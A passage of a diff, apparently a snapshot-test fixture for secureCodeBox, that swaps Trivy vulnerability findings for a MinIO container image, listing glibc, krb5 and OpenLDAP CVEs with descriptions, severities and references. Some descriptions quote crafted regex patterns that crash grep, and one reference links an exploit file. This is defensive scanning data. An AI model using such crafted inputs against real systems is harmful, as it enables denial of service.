"https://lists.gnu.org/archive/html/bug-gnulib/2019-01/msg00108.html", + "https://nvd.nist.gov/vuln/detail/CVE-2018-20796", + "https://security.netapp.com/advisory/ntap-20190315-0002/", + "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", + "https://www.cve.org/CVERecord?id=CVE-2018-20796", ], }, "category": "Vulnerability", - "description": "PAC parsing in MIT Kerberos 5 (aka krb5) before 1.19.4 and 1.20.x before 1.20.1 has integer overflows that may lead to remote code execution (in KDC, kadmind, or a GSS or Kerberos application server) on 32-bit platforms (which have a resultant heap-based buffer overflow), and cause a denial of service on other platforms. This occurs in krb5_pac_parse in lib/krb5/krb/pac.c. Heimdal before 7.7.1 has "a similar bug."", + "description": "In the GNU C Library (aka glibc or libc6) through 2.29, check_dst_limits_calc_pos_1 in posix/regexec.c has Uncontrolled Recursion, as demonstrated by '(\\227|)(\\\\1\\\\1|t1|\\\\\\2537)+' in grep.", "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "integer overflow vulnerabilities in PAC parsing", + "name": "glibc: uncontrolled recursion in function check_dst_limits_calc_pos_1 in posix/regexec.c", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-42898", - }, - { - "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:8637", + "value": "https://avd.aquasec.com/nvd/cve-2018-20796", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-42898", + "value": "http://www.securityfocus.com/bid/107160", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2140960", + "value": "https://access.redhat.com/security/cve/CVE-2018-20796", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2140960", + "value": "https://debbugs.gnu.org/cgi/bugreport.cgi?bug=34141", }, { "type": "URL", - "value": "https://bugzilla.samba.org/show_bug.cgi?id=15203", + "value": "https://lists.gnu.org/archive/html/bug-gnulib/2019-01/msg00108.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-20796", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-8637.html", + "value": "https://security.netapp.com/advisory/ntap-20190315-0002/", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:8637", + "value": "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", }, { "type": "URL", - "value": "https://github.com/heimdal/heimdal/security/advisories/GHSA-64mq-fvfj-5x3c", + "value": "https://www.cve.org/CVERecord?id=CVE-2018-20796", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-1010022", + "installedVersion": "2.31-13+deb11u3", + "packageName": "libc-bin", + "references": [ + "https://access.redhat.com/security/cve/CVE-2019-1010022", + "https://nvd.nist.gov/vuln/detail/CVE-2019-1010022", + "https://security-tracker.debian.org/tracker/CVE-2019-1010022", + "https://sourceware.org/bugzilla/show_bug.cgi?id=22850", + "https://sourceware.org/bugzilla/show_bug.cgi?id=22850#c3", + "https://ubuntu.com/security/CVE-2019-1010022", + "https://www.cve.org/CVERecord?id=CVE-2019-1010022", + ], + }, + "category": "Vulnerability", + "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may bypass stack guard protection. The component is: nptl. The attack vector is: Exploit stack buffer overflow vulnerability and use this bypass vulnerability to bypass stack guard. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "glibc: stack guard protection bypass", + "references": [ { "type": "URL", - "value": "https://github.com/krb5/krb5/commit/ea92d2f0fcceb54a70910fa32e9a0d7a5afc3583", + "value": "https://avd.aquasec.com/nvd/cve-2019-1010022", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-42898.html", + "value": "https://access.redhat.com/security/cve/CVE-2019-1010022", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-12104.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010022", }, { "type": "URL", - "value": "https://mailman.mit.edu/pipermail/krbdev/2022-November/013576.html", + "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010022", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-42898", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22850", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230216-0008/", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22850#c3", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230223-0001/", + "value": "https://ubuntu.com/security/CVE-2019-1010022", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5800-1", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010022", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-1010023", + "installedVersion": "2.31-13+deb11u3", + "packageName": "libc-bin", + "references": [ + "http://www.securityfocus.com/bid/109167", + "https://access.redhat.com/security/cve/CVE-2019-1010023", + "https://nvd.nist.gov/vuln/detail/CVE-2019-1010023", + "https://security-tracker.debian.org/tracker/CVE-2019-1010023", + "https://sourceware.org/bugzilla/show_bug.cgi?id=22851", + "https://support.f5.com/csp/article/K11932200?utm_source=f5support&utm_medium=RSS", + "https://ubuntu.com/security/CVE-2019-1010023", + "https://www.cve.org/CVERecord?id=CVE-2019-1010023", + ], + }, + "category": "Vulnerability", + "description": "** DISPUTED ** GNU Libc current is affected by: Re-mapping current loaded library with malicious ELF file. The impact is: In worst case attacker may evaluate privileges. The component is: libld. The attack vector is: Attacker sends 2 ELF files to victim and asks to run ldd on it. ldd execute code. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "glibc: running ldd on malicious ELF leads to code execution because of wrong size computation", + "references": [ { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5822-1", + "value": "https://avd.aquasec.com/nvd/cve-2019-1010023", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5822-2", + "value": "http://www.securityfocus.com/bid/109167", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5828-1", + "value": "https://access.redhat.com/security/cve/CVE-2019-1010023", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5936-1", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010023", }, { "type": "URL", - "value": "https://web.mit.edu/kerberos/advisories/", + "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010023", }, { "type": "URL", - "value": "https://web.mit.edu/kerberos/krb5-1.19/", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22851", }, { "type": "URL", - "value": "https://web.mit.edu/kerberos/krb5-1.20/README-1.20.1.txt", + "value": "https://support.f5.com/csp/article/K11932200?utm_source=f5support&utm_medium=RSS", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-42898", + "value": "https://ubuntu.com/security/CVE-2019-1010023", }, { "type": "URL", - "value": "https://www.samba.org/samba/security/CVE-2022-42898.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010023", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { "fixedVersion": undefined, "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2018-5709", - "installedVersion": "1.18.3-6+deb11u1", - "packageName": "libkrb5-3", + "id": "CVE-2019-1010024", + "installedVersion": "2.31-13+deb11u3", + "packageName": "libc-bin", "references": [ - "https://access.redhat.com/security/cve/CVE-2018-5709", - "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", - "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", - "https://www.cve.org/CVERecord?id=CVE-2018-5709", + "http://www.securityfocus.com/bid/109162", + "https://access.redhat.com/security/cve/CVE-2019-1010024", + "https://nvd.nist.gov/vuln/detail/CVE-2019-1010024", + "https://security-tracker.debian.org/tracker/CVE-2019-1010024", + "https://sourceware.org/bugzilla/show_bug.cgi?id=22852", + "https://support.f5.com/csp/article/K06046097", + "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", + "https://ubuntu.com/security/CVE-2019-1010024", + "https://www.cve.org/CVERecord?id=CVE-2019-1010024", ], }, "category": "Vulnerability", - "description": "An issue was discovered in MIT Kerberos 5 (aka krb5) through 1.16. There is a variable "dbentry->n_key_data" in kadmin/dbutil/dump.c that can store 16-bit data but unknowingly the developer has assigned a "u4" variable to it, which is for 32-bit data. An attacker can use this vulnerability to affect other artifacts of the database as we know that a Kerberos database dump file contains trusted data.", + "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may bypass ASLR using cache of thread stack and heap. The component is: glibc. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "krb5: integer overflow in dbentry->n_key_data in kadmin/dbutil/dump.c", + "name": "glibc: ASLR bypass using cache of thread stack and heap", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2018-5709", + "value": "https://avd.aquasec.com/nvd/cve-2019-1010024", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2018-5709", + "value": "http://www.securityfocus.com/bid/109162", }, { "type": "URL", - "value": "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", + "value": "https://access.redhat.com/security/cve/CVE-2019-1010024", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010024", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", + "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010024", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2018-5709", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22852", + }, + { + "type": "URL", + "value": "https://support.f5.com/csp/article/K06046097", + }, + { + "type": "URL", + "value": "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/CVE-2019-1010024", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010024", }, ], "severity": "LOW", }, { "attributes": { - "fixedVersion": "1.18.3-6+deb11u3", + "fixedVersion": undefined, "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-42898", - "installedVersion": "1.18.3-6+deb11u1", - "packageName": "libkrb5support0", + "id": "CVE-2019-1010025", + "installedVersion": "2.31-13+deb11u3", + "packageName": "libc-bin", "references": [ - "https://access.redhat.com/errata/RHSA-2022:8637", - "https://access.redhat.com/security/cve/CVE-2022-42898", - "https://bugzilla.redhat.com/2140960", - "https://bugzilla.redhat.com/show_bug.cgi?id=2140960", - "https://bugzilla.samba.org/show_bug.cgi?id=15203", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898", - "https://errata.almalinux.org/9/ALSA-2022-8637.html", - "https://errata.rockylinux.org/RLSA-2022:8637", - "https://github.com/heimdal/heimdal/security/advisories/GHSA-64mq-fvfj-5x3c", - "https://github.com/krb5/krb5/commit/ea92d2f0fcceb54a70910fa32e9a0d7a5afc3583", - "https://linux.oracle.com/cve/CVE-2022-42898.html", - "https://linux.oracle.com/errata/ELSA-2023-12104.html", - "https://mailman.mit.edu/pipermail/krbdev/2022-November/013576.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-42898", - "https://security.netapp.com/advisory/ntap-20230216-0008/", - "https://security.netapp.com/advisory/ntap-20230223-0001/", - "https://ubuntu.com/security/notices/USN-5800-1", - "https://ubuntu.com/security/notices/USN-5822-1", - "https://ubuntu.com/security/notices/USN-5822-2", - "https://ubuntu.com/security/notices/USN-5828-1", - "https://ubuntu.com/security/notices/USN-5936-1", - "https://web.mit.edu/kerberos/advisories/", - "https://web.mit.edu/kerberos/krb5-1.19/", - "https://web.mit.edu/kerberos/krb5-1.20/README-1.20.1.txt", - "https://www.cve.org/CVERecord?id=CVE-2022-42898", - "https://www.samba.org/samba/security/CVE-2022-42898.html", + "https://access.redhat.com/security/cve/CVE-2019-1010025", + "https://nvd.nist.gov/vuln/detail/CVE-2019-1010025", + "https://security-tracker.debian.org/tracker/CVE-2019-1010025", + "https://sourceware.org/bugzilla/show_bug.cgi?id=22853", + "https://support.f5.com/csp/article/K06046097", + "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", + "https://ubuntu.com/security/CVE-2019-1010025", + "https://www.cve.org/CVERecord?id=CVE-2019-1010025", ], }, "category": "Vulnerability", - "description": "PAC parsing in MIT Kerberos 5 (aka krb5) before 1.19.4 and 1.20.x before 1.20.1 has integer overflows that may lead to remote code execution (in KDC, kadmind, or a GSS or Kerberos application server) on 32-bit platforms (which have a resultant heap-based buffer overflow), and cause a denial of service on other platforms. This occurs in krb5_pac_parse in lib/krb5/krb/pac.c. Heimdal before 7.7.1 has "a similar bug."", + "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may guess the heap addresses of pthread_created thread. The component is: glibc. NOTE: the vendor's position is "ASLR bypass itself is not a vulnerability."", "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "integer overflow vulnerabilities in PAC parsing", + "name": "glibc: information disclosure of heap addresses of pthread_created thread", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-42898", - }, - { - "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:8637", + "value": "https://avd.aquasec.com/nvd/cve-2019-1010025", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-42898", + "value": "https://access.redhat.com/security/cve/CVE-2019-1010025", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2140960", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010025", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2140960", + "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010025", }, { "type": "URL", - "value": "https://bugzilla.samba.org/show_bug.cgi?id=15203", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22853", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898", + "value": "https://support.f5.com/csp/article/K06046097", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-8637.html", + "value": "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:8637", + "value": "https://ubuntu.com/security/CVE-2019-1010025", }, { "type": "URL", - "value": "https://github.com/heimdal/heimdal/security/advisories/GHSA-64mq-fvfj-5x3c", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010025", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-9192", + "installedVersion": "2.31-13+deb11u3", + "packageName": "libc-bin", + "references": [ + "https://access.redhat.com/security/cve/CVE-2019-9192", + "https://nvd.nist.gov/vuln/detail/CVE-2019-9192", + "https://sourceware.org/bugzilla/show_bug.cgi?id=24269", + "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", + "https://www.cve.org/CVERecord?id=CVE-2019-9192", + ], + }, + "category": "Vulnerability", + "description": "** DISPUTED ** In the GNU C Library (aka glibc or libc6) through 2.29, check_dst_limits_calc_pos_1 in posix/regexec.c has Uncontrolled Recursion, as demonstrated by '(|)(\\\\1\\\\1)*' in grep, a different issue than CVE-2018-20796. NOTE: the software maintainer disputes that this is a vulnerability because the behavior occurs only with a crafted pattern.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "glibc: uncontrolled recursion in function check_dst_limits_calc_pos_1 in posix/regexec.c", + "references": [ { "type": "URL", - "value": "https://github.com/krb5/krb5/commit/ea92d2f0fcceb54a70910fa32e9a0d7a5afc3583", + "value": "https://avd.aquasec.com/nvd/cve-2019-9192", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-42898.html", + "value": "https://access.redhat.com/security/cve/CVE-2019-9192", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-12104.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-9192", }, { "type": "URL", - "value": "https://mailman.mit.edu/pipermail/krbdev/2022-November/013576.html", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=24269", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-42898", + "value": "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230216-0008/", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-9192", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": "2.31-13+deb11u4", + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-3999", + "installedVersion": "2.31-13+deb11u3", + "packageName": "libc6", + "references": [ + "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-3999.json", + "https://access.redhat.com/security/cve/CVE-2021-3999", + "https://bugzilla.redhat.com/show_bug.cgi?id=2024637", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3999", + "https://linux.oracle.com/cve/CVE-2021-3999.html", + "https://linux.oracle.com/errata/ELSA-2022-9234.html", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "https://nvd.nist.gov/vuln/detail/CVE-2021-3999", + "https://security-tracker.debian.org/tracker/CVE-2021-3999", + "https://security.netapp.com/advisory/ntap-20221104-0001/", + "https://sourceware.org/bugzilla/show_bug.cgi?id=28769", + "https://sourceware.org/git/gitweb.cgi?p=glibc.git%3Bh=23e0e8f5f1fb5ed150253d986ecccdc90c2dcd5e", + "https://ubuntu.com/security/notices/USN-5310-1", + "https://ubuntu.com/security/notices/USN-5310-2", + "https://www.cve.org/CVERecord?id=CVE-2021-3999", + "https://www.openwall.com/lists/oss-security/2022/01/24/4", + ], + }, + "category": "Vulnerability", + "description": "A flaw was found in glibc. An off-by-one buffer overflow and underflow in getcwd() may lead to memory corruption when the size of the buffer is exactly 1. A local attacker who can control the input buffer and size passed to getcwd() in a setuid program could use this flaw to potentially execute arbitrary code and escalate their privileges on the system.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "glibc: Off-by-one buffer overflow/underflow in getcwd()", + "references": [ { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230223-0001/", + "value": "https://avd.aquasec.com/nvd/cve-2021-3999", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5800-1", + "value": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-3999.json", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5822-1", + "value": "https://access.redhat.com/security/cve/CVE-2021-3999", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5822-2", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2024637", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5828-1", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3999", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5936-1", + "value": "https://linux.oracle.com/cve/CVE-2021-3999.html", }, { "type": "URL", - "value": "https://web.mit.edu/kerberos/advisories/", + "value": "https://linux.oracle.com/errata/ELSA-2022-9234.html", }, { "type": "URL", - "value": "https://web.mit.edu/kerberos/krb5-1.19/", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, { "type": "URL", - "value": "https://web.mit.edu/kerberos/krb5-1.20/README-1.20.1.txt", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3999", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-42898", + "value": "https://security-tracker.debian.org/tracker/CVE-2021-3999", }, { "type": "URL", - "value": "https://www.samba.org/samba/security/CVE-2022-42898.html", + "value": "https://security.netapp.com/advisory/ntap-20221104-0001/", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2018-5709", - "installedVersion": "1.18.3-6+deb11u1", - "packageName": "libkrb5support0", - "references": [ - "https://access.redhat.com/security/cve/CVE-2018-5709", - "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", - "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", - "https://www.cve.org/CVERecord?id=CVE-2018-5709", - ], - }, - "category": "Vulnerability", - "description": "An issue was discovered in MIT Kerberos 5 (aka krb5) through 1.16. There is a variable "dbentry->n_key_data" in kadmin/dbutil/dump.c that can store 16-bit data but unknowingly the developer has assigned a "u4" variable to it, which is for 32-bit data. An attacker can use this vulnerability to affect other artifacts of the database as we know that a Kerberos database dump file contains trusted data.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "krb5: integer overflow in dbentry->n_key_data in kadmin/dbutil/dump.c", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2018-5709", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=28769", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2018-5709", + "value": "https://sourceware.org/git/gitweb.cgi?p=glibc.git%3Bh=23e0e8f5f1fb5ed150253d986ecccdc90c2dcd5e", }, { "type": "URL", - "value": "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", + "value": "https://ubuntu.com/security/notices/USN-5310-1", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "value": "https://ubuntu.com/security/notices/USN-5310-2", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-3999", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2018-5709", + "value": "https://www.openwall.com/lists/oss-security/2022/01/24/4", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { "fixedVersion": undefined, "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-2953", - "installedVersion": "2.4.57+dfsg-3+deb11u1", - "packageName": "libldap-2.4-2", + "id": "CVE-2010-4756", + "installedVersion": "2.31-13+deb11u3", + "packageName": "libc6", "references": [ - "https://access.redhat.com/security/cve/CVE-2023-2953", - "https://bugs.openldap.org/show_bug.cgi?id=9904", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2953", - "https://nvd.nist.gov/vuln/detail/CVE-2023-2953", - "https://www.cve.org/CVERecord?id=CVE-2023-2953", + "http://cxib.net/stuff/glob-0day.c", + "http://securityreason.com/achievement_securityalert/89", + "http://securityreason.com/exploitalert/9223", + "https://access.redhat.com/security/cve/CVE-2010-4756", + "https://bugzilla.redhat.com/show_bug.cgi?id=681681", + "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2010-4756", + "https://nvd.nist.gov/vuln/detail/CVE-2010-4756", + "https://www.cve.org/CVERecord?id=CVE-2010-4756", ], }, "category": "Vulnerability", - "description": "A vulnerability was found in openldap. This security flaw causes a null pointer dereference in ber_memalloc_x() function.", + "description": "The glob implementation in the GNU C Library (aka glibc or libc6) allows remote authenticated users to cause a denial of service (CPU and memory consumption) via crafted glob expressions that do not match any pathnames, as demonstrated by glob expressions in STAT commands to an FTP daemon, a different vulnerability than CVE-2010-2632.", "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "null pointer dereference in ber_memalloc_x function", + "name": "glibc: glob implementation can cause excessive CPU and memory consumption due to crafted glob expressions", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-2953", + "value": "https://avd.aquasec.com/nvd/cve-2010-4756", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-2953", + "value": "http://cxib.net/stuff/glob-0day.c", }, { "type": "URL", - "value": "https://bugs.openldap.org/show_bug.cgi?id=9904", + "value": "http://securityreason.com/achievement_securityalert/89", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2953", + "value": "http://securityreason.com/exploitalert/9223", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-2953", + "value": "https://access.redhat.com/security/cve/CVE-2010-4756", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-2953", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=681681", + }, + { + "type": "URL", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2010-4756", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2010-4756", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2010-4756", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { "fixedVersion": undefined, "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2015-3276", - "installedVersion": "2.4.57+dfsg-3+deb11u1", - "packageName": "libldap-2.4-2", + "id": "CVE-2018-20796", + "installedVersion": "2.31-13+deb11u3", + "packageName": "libc6", "references": [ - "http://rhn.redhat.com/errata/RHSA-2015-2131.html", - "http://www.oracle.com/technetwork/topics/security/linuxbulletinoct2015-2719645.html", - "http://www.securitytracker.com/id/1034221", - "https://access.redhat.com/security/cve/CVE-2015-3276", - "https://bugzilla.redhat.com/show_bug.cgi?id=1238322", - "https://linux.oracle.com/cve/CVE-2015-3276.html", - "https://linux.oracle.com/errata/ELSA-2015-2131.html", - "https://nvd.nist.gov/vuln/detail/CVE-2015-3276", - "https://www.cve.org/CVERecord?id=CVE-2015-3276", + "http://www.securityfocus.com/bid/107160", + "https://access.redhat.com/security/cve/CVE-2018-20796", + "https://debbugs.gnu.org/cgi/bugreport.cgi?bug=34141", + "https://lists.gnu.org/archive/html/bug-gnulib/2019-01/msg00108.html", + "https://nvd.nist.gov/vuln/detail/CVE-2018-20796", + "https://security.netapp.com/advisory/ntap-20190315-0002/", + "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", + "https://www.cve.org/CVERecord?id=CVE-2018-20796", ], }, "category": "Vulnerability", - "description": "The nss_parse_ciphers function in libraries/libldap/tls_m.c in OpenLDAP does not properly parse OpenSSL-style multi-keyword mode cipher strings, which might cause a weaker than intended cipher to be used and allow remote attackers to have unspecified impact via unknown vectors.", + "description": "In the GNU C Library (aka glibc or libc6) through 2.29, check_dst_limits_calc_pos_1 in posix/regexec.c has Uncontrolled Recursion, as demonstrated by '(\\227|)(\\\\1\\\\1|t1|\\\\\\2537)+' in grep.", "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "incorrect multi-keyword mode cipherstring parsing", + "name": "glibc: uncontrolled recursion in function check_dst_limits_calc_pos_1 in posix/regexec.c", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2015-3276", - }, - { - "type": "URL", - "value": "http://rhn.redhat.com/errata/RHSA-2015-2131.html", + "value": "https://avd.aquasec.com/nvd/cve-2018-20796", }, { "type": "URL", - "value": "http://www.oracle.com/technetwork/topics/security/linuxbulletinoct2015-2719645.html", + "value": "http://www.securityfocus.com/bid/107160", }, { "type": "URL", - "value": "http://www.securitytracker.com/id/1034221", + "value": "https://access.redhat.com/security/cve/CVE-2018-20796", }, { "type": "URL", - 